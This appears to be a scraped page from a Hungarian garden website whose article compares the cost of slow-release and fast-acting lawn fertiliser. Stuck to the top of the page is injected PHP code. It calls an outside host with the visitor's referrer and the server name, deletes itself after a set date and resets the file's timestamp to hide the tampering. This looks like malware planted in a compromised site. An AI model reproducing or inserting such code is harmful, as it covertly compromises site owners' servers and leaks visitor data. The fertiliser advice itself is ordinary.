check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Hogyan csökkentsük a műtrágyázás költségeit?

Hogyan csökkentsük a műtrágyázás költségeit?

 

Még mielőtt megijedne, itt csak egy egyszerű árkalkulációt fogok végezni, az árak persze minden évben módosulnak, és tapasztalataim alapján soha nem csökkennek. Elmondható azonban, hogy az arányok megmaradnak. Egy tartós hatású műtrágya általában 3-8 hónapig, de legfeljebb  egy évig képes a talajban kielégítő mennyiségű tápanyagot biztosítani. Az ilyen műtrágyák elég magas áron kerülnek forgalomba. Kereskedelmi áron is 25-40 ezer forintba kerül 25 kg, melynek ajánlott dózisa 25-35 g/négyzetméter, így egy zsák 700-1000 négyzetméterre elegendő. A rövid hatástartamú, azonnal felszívódó műtrágyapedig mindössze 7-10 ezer forintba kerül, miközben ugyanekkora terület beszórására, tápagyaggal való ellátására elegendő. A rövid hatástartalmú műtrágyából persze elképzelhető, hogy kétszer kell a fűre szórnunk a szezon időtartam alatt, de még így is gazdaságosabban ússzuk meg a gyepünk műtrágyázását. Ilyen esetben a fű szinte a teljes kiszórt mennyiséget hasznosítani tudja. Ha kiszámoljuk, 700-1000 négyzetméter területre kb. 15-20 ezer forintba kerül a műtrágya 3-4 hónapra. Ebből az következik, hogy ha hosszú hatástartamú műtrágyát vásárolunk, és azt jutatjuk ki a gyepünkre, és rendszeres fűnyírások alkalmával fűnyíróval átmegyünk rajta, az apró gyantával bevont szemcséket szépen felaprítjuk vele, a gyantaburok megsérül a víz így már szétáztatja, lebontja a műtrágyát, és kb. 1 hét alatt az egész tápanyag mennyiség a talajba kerül. Ugyan úgy, mintha azonnal felszívódó műtrágyát használtunk volna. Ez csak akkor történik így, ha mulcsozó, vagy kidobó funkcióval vágjuk a füvünket. Fűgyűjtő kosaras fűnyíróval vágva a gyepünket, a fűnyíró gép kései a szemcsék kb. 50 %-át már az első alkalommal felszedi, és az egész mennyiség jobb esetben a komposztunkon fog kikötni. Abban az esetben, ha nem saját komposztállóban gyűjtjük a lenyírt nyesedéket, hanem zsákoljuk és kidobjuk, akkor viszont a szemétre kerül. Gondoljon csak bele! Még mindig megéri? Az azonnal felszívódó műtrágya szinte az első napokban a talajba kerül. A következő fűnyíráskor már egészen biztos, hogy nem fog a fűgyűjtőbe kerülni. Olcsóbb, mint a tartós hatású műtrágya, nagyobb százaléka hasznosul, tehát sokszorosan megéri ezt választani, mert megtérül a befektetett összeg. Ne dőljön be az első ajánlatnak, mely évi egyszeri műtrágyázással gyönyörű gyepet ígér. Válassza inkább az olcsóbb, azonnal felszívódó műtrágyát a pázsit táplálására. Virágágyak, sziklakertek és más területek trágyázására természetesen tökéletes a tartós műtrágya, mert ott nem tesszük ki mechanikai sérüléseknek a kiszórt granulátumot.

 

 
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú